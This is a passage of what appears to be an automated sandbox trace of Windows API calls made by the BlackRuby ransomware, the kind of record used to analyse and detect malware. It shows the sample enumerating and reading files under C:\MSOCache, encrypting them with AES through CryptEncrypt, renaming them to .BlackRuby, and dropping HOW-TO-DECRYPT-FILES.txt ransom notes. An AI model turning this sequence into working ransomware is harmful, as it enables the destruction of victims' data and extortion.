(hObject=0x184) returned 1 [0045.308] GetLastError () returned 0xb7 [0045.308] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\powerpointmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x23362bc0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x720)) returned 1 [0045.308] GetLastError () returned 0xb7 [0045.308] SetErrorMode (uMode=0x0) returned 0x1 [0045.308] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\powerpointmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Encrypted_GzrIoDFUVb86W2XNDACnE9I66EpaFJEgQunf.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\encrypted_gzriodfuvb86w2xndacne9i66epafjegqunf.blackruby")) returned 1 [0045.309] GetLastError () returned 0xb7 [0045.309] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.309] GetLastError () returned 0x5 [0045.310] SetErrorMode (uMode=0x0) returned 0x1 [0045.310] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\PptLR.cab", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\PptLR.cab", lpFilePart=0x0) returned 0x48 [0045.310] GetLastError () returned 0x5 [0045.310] SetErrorMode (uMode=0x1) returned 0x0 [0045.311] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\pptlr.cab"), fInfoLevelId=0x0, lpFileInformation=0x1c89520 | out: lpFileInformation=0x1c89520*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5fb6800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x5fb6800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x30f8b950, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x43b29f1)) returned 1 [0045.311] GetLastError () returned 0x5 [0045.311] SetErrorMode (uMode=0x0) returned 0x1 [0045.312] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.312] GetLastError () returned 0x5 [0045.312] SetErrorMode (uMode=0x1) returned 0x0 [0045.312] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.312] GetLastError () returned 0x5 [0045.313] SetErrorMode (uMode=0x0) returned 0x1 [0045.313] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.313] GetLastError () returned 0x5 [0045.313] SetErrorMode (uMode=0x1) returned 0x0 [0045.313] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x1ca72f8 | out: lpFileInformation=0x1ca72f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3584aa10, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x75e)) returned 1 [0045.314] GetLastError () returned 0x5 [0045.314] SetErrorMode (uMode=0x0) returned 0x1 [0045.314] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.314] GetLastError () returned 0x5 [0045.314] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.314] GetLastError () returned 0x5 [0045.314] SetErrorMode (uMode=0x1) returned 0x0 [0045.314] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.314] GetLastError () returned 0x0 [0045.314] GetFileType (hFile=0x184) returned 0x1 [0045.314] SetErrorMode (uMode=0x0) returned 0x1 [0045.314] GetFileType (hFile=0x184) returned 0x1 [0045.314] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x75e [0045.314] GetLastError () returned 0x0 [0045.315] ReadFile (in: hFile=0x184, lpBuffer=0x1ca9748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1ca9748*, lpNumberOfBytesRead=0x18ed84*=0x75e, lpOverlapped=0x0) returned 1 [0045.316] GetLastError () returned 0x0 [0045.316] CloseHandle (hObject=0x184) returned 1 [0045.316] GetLastError () returned 0x0 [0045.316] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.316] GetLastError () returned 0x0 [0045.316] SetErrorMode (uMode=0x1) returned 0x0 [0045.316] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3584aa10, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x75e)) returned 1 [0045.316] GetLastError () returned 0x0 [0045.316] SetErrorMode (uMode=0x0) returned 0x1 [0045.316] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c708) returned 1 [0045.316] GetLastError () returned 0x0 [0045.349] CryptImportKey (in: hProv=0x37c708, pbData=0x1d05280, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ce0) returned 1 [0045.349] GetLastError () returned 0x0 [0045.349] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.349] GetLastError () returned 0x0 [0045.356] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.357] GetLastError () returned 0x0 [0045.357] CryptDuplicateKey (in: hKey=0x360ce0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360a20) returned 1 [0045.357] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.357] GetLastError () returned 0x0 [0045.357] CryptSetKeyParam (hKey=0x360a20, dwParam=0x4, pbData=0x1b34d14*=0x1, dwFlags=0x0) returned 1 [0045.357] GetLastError () returned 0x0 [0045.357] CryptSetKeyParam (hKey=0x360a20, dwParam=0x1, pbData=0x1b34ce0, dwFlags=0x0) returned 1 [0045.357] GetLastError () returned 0x0 [0045.357] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b34d5c*, pdwDataLen=0x18ed74*=0x850, dwBufLen=0x850 | out: pbData=0x1b34d5c*, pdwDataLen=0x18ed74*=0x850) returned 1 [0045.357] GetLastError () returned 0x0 [0045.357] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b35e28*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1b35e28*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0045.357] GetLastError () returned 0x0 [0045.357] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b35e58*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1b35e58*, pdwDataLen=0x18ed94*=0x10) returned 1 [0045.357] GetLastError () returned 0x0 [0045.357] CryptDestroyKey (hKey=0x360ce0) returned 1 [0045.357] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0045.357] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0045.357] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.357] GetLastError () returned 0x0 [0045.357] SetErrorMode (uMode=0x1) returned 0x0 [0045.357] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.358] GetLastError () returned 0xb7 [0045.358] GetFileType (hFile=0x184) returned 0x1 [0045.358] SetErrorMode (uMode=0x0) returned 0x1 [0045.358] GetFileType (hFile=0x184) returned 0x1 [0045.360] CloseHandle (hObject=0x184) returned 1 [0045.360] GetLastError () returned 0xb7 [0045.360] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.360] GetLastError () returned 0xb7 [0045.360] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Encrypted_SK7Iz1MANHWimPGRfrC3Rcx0yXEiBCYcyZU2wkqe.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Encrypted_SK7Iz1MANHWimPGRfrC3Rcx0yXEiBCYcyZU2wkqe.BlackRuby", lpFilePart=0x0) returned 0x7b [0045.360] GetLastError () returned 0xb7 [0045.360] SetErrorMode (uMode=0x1) returned 0x0 [0045.360] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x233d4fe0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x860)) returned 1 [0045.360] GetLastError () returned 0xb7 [0045.360] SetErrorMode (uMode=0x0) returned 0x1 [0045.360] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\Encrypted_SK7Iz1MANHWimPGRfrC3Rcx0yXEiBCYcyZU2wkqe.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\encrypted_sk7iz1manhwimpgrfrc3rcx0yxeibcycyzu2wkqe.blackruby")) returned 1 [0045.360] GetLastError () returned 0xb7 [0045.361] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.361] GetLastError () returned 0xb7 [0045.361] SetErrorMode (uMode=0x1) returned 0x0 [0045.361] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.361] GetLastError () returned 0x5 [0045.362] SetErrorMode (uMode=0x0) returned 0x1 [0045.362] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0045.362] GetLastError () returned 0x5 [0045.362] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.362] GetLastError () returned 0x5 [0045.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.362] GetLastError () returned 0x5 [0045.362] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0045.362] GetLastError () returned 0x5 [0045.362] SetErrorMode (uMode=0x1) returned 0x0 [0045.362] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ce0 [0045.372] GetLastError () returned 0x5 [0045.372] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.373] GetLastError () returned 0x5 [0045.373] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.373] GetLastError () returned 0x5 [0045.373] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.373] GetLastError () returned 0x5 [0045.373] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.373] GetLastError () returned 0x5 [0045.373] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.373] GetLastError () returned 0x5 [0045.373] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.373] GetLastError () returned 0x12 [0045.374] FindClose (in: hFindFile=0x360ce0 | out: hFindFile=0x360ce0) returned 1 [0045.374] SetErrorMode (uMode=0x0) returned 0x1 [0045.374] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0045.374] GetLastError () returned 0x12 [0045.374] SetErrorMode (uMode=0x1) returned 0x0 [0045.375] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ce0 [0045.375] GetLastError () returned 0x12 [0045.375] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.376] GetLastError () returned 0x12 [0045.376] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.376] GetLastError () returned 0x12 [0045.376] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.376] GetLastError () returned 0x12 [0045.376] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.376] GetLastError () returned 0x12 [0045.376] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.376] GetLastError () returned 0x12 [0045.376] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.376] GetLastError () returned 0x12 [0045.376] FindClose (in: hFindFile=0x360ce0 | out: hFindFile=0x360ce0) returned 1 [0045.377] SetErrorMode (uMode=0x0) returned 0x1 [0045.377] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.msi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.msi", lpFilePart=0x0) returned 0x4f [0045.377] GetLastError () returned 0x12 [0045.377] SetErrorMode (uMode=0x1) returned 0x0 [0045.377] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-0000-0000000ff1ce}-c\\publishermui.msi"), fInfoLevelId=0x0, lpFileInformation=0x1b57704 | out: lpFileInformation=0x1b57704*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x20354600, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x20354600, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3bd4e010, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x1ba200)) returned 1 [0045.379] GetLastError () returned 0x12 [0045.379] SetErrorMode (uMode=0x0) returned 0x1 [0045.379] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.379] GetLastError () returned 0x12 [0045.379] SetErrorMode (uMode=0x1) returned 0x0 [0045.379] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.380] GetLastError () returned 0x0 [0045.380] GetFileType (hFile=0x184) returned 0x1 [0045.380] SetErrorMode (uMode=0x0) returned 0x1 [0045.380] GetFileType (hFile=0x184) returned 0x1 [0045.380] WriteFile (in: hFile=0x184, lpBuffer=0x1b7355c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1b7355c*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0045.381] GetLastError () returned 0x0 [0045.381] CloseHandle (hObject=0x184) returned 1 [0045.381] GetLastError () returned 0x0 [0045.381] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.381] GetLastError () returned 0x0 [0045.381] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.381] GetLastError () returned 0x0 [0045.381] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0045.381] GetLastError () returned 0x0 [0045.381] SetErrorMode (uMode=0x1) returned 0x0 [0045.381] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-0000-0000000ff1ce}-c\\publishermui.xml"), fInfoLevelId=0x0, lpFileInformation=0x1b75268 | out: lpFileInformation=0x1b75268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3bd29620, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x5aa)) returned 1 [0045.382] GetLastError () returned 0x0 [0045.382] SetErrorMode (uMode=0x0) returned 0x1 [0045.382] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0045.382] GetLastError () returned 0x0 [0045.382] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0045.382] GetLastError () returned 0x0 [0045.382] SetErrorMode (uMode=0x1) returned 0x0 [0045.382] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-0000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.382] GetLastError () returned 0x0 [0045.382] GetFileType (hFile=0x184) returned 0x1 [0045.382] SetErrorMode (uMode=0x0) returned 0x1 [0045.382] GetFileType (hFile=0x184) returned 0x1 [0045.382] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x5aa [0045.382] GetLastError () returned 0x0 [0045.382] ReadFile (in: hFile=0x184, lpBuffer=0x1b77984, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1b77984*, lpNumberOfBytesRead=0x18ed84*=0x5aa, lpOverlapped=0x0) returned 1 [0045.384] GetLastError () returned 0x0 [0045.384] CloseHandle (hObject=0x184) returned 1 [0045.384] GetLastError () returned 0x0 [0045.384] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0045.384] GetLastError () returned 0x0 [0045.384] SetErrorMode (uMode=0x1) returned 0x0 [0045.384] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-0000-0000000ff1ce}-c\\publishermui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3bd29620, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x5aa)) returned 1 [0045.384] GetLastError () returned 0x0 [0045.384] 